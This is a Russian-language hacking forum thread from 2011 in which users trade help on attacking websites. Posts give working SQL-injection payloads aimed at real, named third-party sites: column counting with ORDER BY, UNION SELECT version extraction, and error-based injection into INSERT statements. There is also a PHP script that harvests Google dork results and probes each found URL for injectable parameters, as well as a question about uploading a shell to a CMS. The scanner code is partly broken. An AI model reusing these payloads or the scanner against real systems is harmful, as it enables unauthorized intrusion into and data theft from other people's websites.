Ваши вопросы по уязвимостям.

noviyuser · 23 Feb 2011

где в cms bitrix найти адрес сайта в бд и в какой таблице или php файле хранится? (наподобие как в жумла в configuration.php есть адрес сайта)

547 · 23 Feb 2011

WebSite CMS v.2.01 кто знает как залить шелл в этой кмс?

asql · 23 Feb 2011

http://politec.ru/country.asp?id=2'
возможно ли обойти фильтрацию?

Яндекс тИЦ 1100
Яндекс Rank 5/6

так к слову....

~d0s~ · 23 Feb 2011

Мб поздно отвечаю, но раньше не мог...

foozzi said:

нашол вот такую уязвимость

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=22'

как ее использовать?
Click to expand...

После ордер бай

http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,1-- 1
http://www.ftpinfo.ru/forum/index.php?showforum=4&prune_day=100&sort_by=Z-A&sort_key=2 DESC limit 0,10-- 1

Фараон said:

Как говорил Dr.Z3r0
Click to expand...

В данном примере фильтровать вообще ничего не нунжно, достаточно преобразовывать в целочисленное значение.

И да, тебе отдельный привет за слитие скуль из приватов других проэктов, ну ты понял.

Ну и как написал выше Redwood там был нарушен синтаксис=/
Redwood said:
Эксплуатация:
HTML:
1' order by 1,2,3,4,5,6,7,8,9,10-- a
Click to expand...
Зачем сортировать перебирая все колонки, если можно сразу указать максимальную?

Cennarios · 23 Feb 2011

asql said:

http://politec.ru/country.asp?id=2'
возможно ли обойти фильтрацию?

Яндекс тИЦ 1100
Яндекс Rank 5/6

так к слову....
Click to expand...

Это не фильтрация, это ошибка в приведении типов данных

Lijzer · 23 Feb 2011

Ребят, первый раз с таким сталкиваюсь и не могу в пост запросе подобрать кол-во полей, все перепробовал пробелы на + /* %20 заменяю ничего понять не могу выдает

Code:

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 21064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 -- ,'0','00074-00033','2011-02-24 05:04:57','0','. .')' at line 2

Что делать?

Seravin · 23 Feb 2011

это очень на insert похоже

FlaktW · 23 Feb 2011

Помогите вывести версию БД.

http://www.courthouseforum.com/forums/view.php?id=1060181'+%6f%72%64%65%72+by+2+--+

ZARO · 23 Feb 2011

FlaktW said:

Помогите вывести версию БД.

http://www.courthouseforum.com/forums/view.php?id=1060181'+%6f%72%64%65%72+by+2+--+
Click to expand...

http://www.courthouseforum.com/forums/view.php?id=1060181'+and%20mid(version(),1,1)=5+--+

Вот еще нашел сскулю с выводом. В другом скрипте.

http://www.courthouseforum.com//forums/directory.php?type=judges&state=8617%20and%201!=1%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

Lijzer · 23 Feb 2011

2Seravin
Можно пару толковых линков по эксплуатации sql inj в инсерт?

Seravin · 23 Feb 2011

не помню, смотри в статьях, заодно пока будешь смотреть найдёшь кучу полезного для себя

~d0s~ · 23 Feb 2011

Lijzer said:

2Seravin
Можно пару толковых линков по эксплуатации sql inj в инсерт?
Click to expand...

Выходишь за пределы инсерта values и делаешь подзапрос, остальное рубишь комментом, самое простое.

krypt3r · 24 Feb 2011

Lijzer, информация к размышлению:

Code:

insert ... values (...) on duplicate key update parent_name = (select 1 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.771' for key 1

Slay90 · 24 Feb 2011

есть ли сканеры по доркам, актуальные на данный момент?

Seravin · 24 Feb 2011

вот, так сказать, в ознакомительных целях скрипт написанный за пару минут(парсинг гугла откуда то с ачата)

Code:

<?php
	$f = fopen("dorks.txt","r");
	$f1 = fopen("links.txt","a");
	while (!feof($f)) {
    $q = fgets($f);
    $been = '';
    $colvo = 17;
    $colvo = 6;
    for($i=0; $i < $colvo*10; $i+=10)
    {
        $url = 'http://www.google.ru/search?hl=ru&q='.urlencode($q).'&start='.($i);
        $html = file_get_contents($url);
        preg_match_all("/<[Aa][ \r\n\t]{1}[^>]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\n\r\t]*([^ \"'>\r\n\t#]+)[^>]*>/",$html,$a);
        for($x=0; $x<sizeof($a[1]); $x++)
        {
            if(strcmp(substr($a[1][$x], 0, 4), 'http') == 0 && 
            strpos($a[1][$x], '74.125.77.132')===false && strpos($a[1][$x], 'google')===false && strpos($a[1][$x], 'youtube')===false)
            {
                $str = urldecode($a[1][$x]);
                $str = substr($str, 7);
                $end = strpos($str, '/');
                if($end > 0)
                    //$str = substr($str, 0, $end);
                if(strpos($been, str_replace('www.','',$str)) === false)
                {
                    $been .= $str . '+';                    
                $url = 'http://'.$str;
                if (strpos($url,'?')!==false) {
                $u = parse_url($url);
                $s = '';
                if (preg_match_all('#(.*?)&#',$u['query'],$q)) {
                foreach ($q[1] as $t) $s.=$t."'&";
                $s.=substr($u['query'],strrpos($u['query'],'&')+1,strlen($u['query']))."'";
                }
                else $s = $u['query']."'";
                $page = file_get_contents($url);
                $page1 = file_get_contents($u['scheme'].'://'.$u['host'].'/'.$u['path'].'?'.$s);
                if ($page!==$page2) fputs($f1,$str."\n");                
                }
                }
            }
        }
        Sleep(45);
    }
	}
	flose($f1);
	flose($f);
?>

Lijzer · 24 Feb 2011

Ребят поставил metasploit framework, захожу в консоль пишу
msf > db_connect db_connect msf3:[email protected]:5432
в ответ
[-] Error while running command db_connect: Failed to connect to the database: could not connect to server: Connection refused (0x0000274D/10061)
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 5432?
Что делать?
p.s. имя юзера и пасс брал /config/database.yml, проштудировал гугл ответа не нашел.

>>> разобрался, ответ нашел тут http://forums.enterprisedb.com/posts/list/1961.page

zlo12 · 25 Feb 2011

есть какие-нибудь проги для упрощения Blind PostgreSQL инъекций?

Slay90 · 25 Feb 2011

Seravin said:

вот, так сказать, в ознакомительных целях скрипт написанный за пару минут(парсинг гугла откуда то с ачата)

Code:

<?php
	$f = fopen("dorks.txt","r");
	$f1 = fopen("links.txt","a");
	while (!feof($f)) {
    $q = fgets($f);
    $been = '';
    $colvo = 17;
    $colvo = 6;
    for($i=0; $i < $colvo*10; $i+=10)
    {
        $url = 'http://www.google.ru/search?hl=ru&q='.urlencode($q).'&start='.($i);
        $html = file_get_contents($url);
        preg_match_all("/<[Aa][ \r\n\t]{1}[^>]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\n\r\t]*([^ \"'>\r\n\t#]+)[^>]*>/",$html,$a);
        for($x=0; $x<sizeof($a[1]); $x++)
        {
            if(strcmp(substr($a[1][$x], 0, 4), 'http') == 0 && 
            strpos($a[1][$x], '74.125.77.132')===false && strpos($a[1][$x], 'google')===false && strpos($a[1][$x], 'youtube')===false)
            {
                $str = urldecode($a[1][$x]);
                $str = substr($str, 7);
                $end = strpos($str, '/');
                if($end > 0)
                    //$str = substr($str, 0, $end);
                if(strpos($been, str_replace('www.','',$str)) === false)
                {
                    $been .= $str . '+';                    
                $url = 'http://'.$str;
                if (strpos($url,'?')!==false) {
                $u = parse_url($url);
                $s = '';
                if (preg_match_all('#(.*?)&#',$u['query'],$q)) {
                foreach ($q[1] as $t) $s.=$t."'&";
                $s.=substr($u['query'],strrpos($u['query'],'&')+1,strlen($u['query']))."'";
                }
                else $s = $u['query']."'";
                $page = file_get_contents($url);
                $page1 = file_get_contents($u['scheme'].'://'.$u['host'].'/'.$u['path'].'?'.$s);
                if ($page!==$page2) fputs($f1,$str."\n");                
                }
                }
            }
        }
        Sleep(45);
    }
	}
	flose($f1);
	flose($f);
?>

Click to expand...

PHP Warning: fopen(dorks.txt): failed to open stream: No such file or directory in C:\Program Files\PHP\1.php on line 2
PHP Warning: feof(): supplied argument is not a valid stream resource in C:\Program Files\PHP\1.php on line 4
PHP Warning: fgets(): supplied argument is not a valid stream resource in C:\Program Files\PHP\1.php on line 5

не работает скрипт =\

Seravin · 25 Feb 2011

значит пока рано тебе этот скрипт использовать

Slay90 · 25 Feb 2011

ну раз рано, то рано, а экзешники есть?

Ваши вопросы по уязвимостям.

noviyuser Member

547 Active Member

asql New Member

~d0s~ Banned

Cennarios Elder - Старейшина

Lijzer Member

Seravin Active Member

FlaktW Elder - Старейшина

ZARO Elder - Старейшина

Lijzer Member

Seravin Active Member

~d0s~ Banned

krypt3r Elder - Старейшина

Slay90 Member

Seravin Active Member

Lijzer Member

zlo12 Elder - Старейшина

Slay90 Member

Seravin Active Member

Slay90 Member

Useful Searches

Ваши вопросы по уязвимостям.

noviyuser Member

547 Active Member

asql New Member

~d0s~ Banned

Cennarios Elder - Старейшина

Lijzer Member

Seravin Active Member

FlaktW Elder - Старейшина

ZARO Elder - Старейшина

Lijzer Member

Seravin Active Member

~d0s~ Banned

krypt3r Elder - Старейшина

Slay90 Member

Seravin Active Member

Lijzer Member

zlo12 Elder - Старейшина

Slay90 Member

Seravin Active Member

Slay90 Member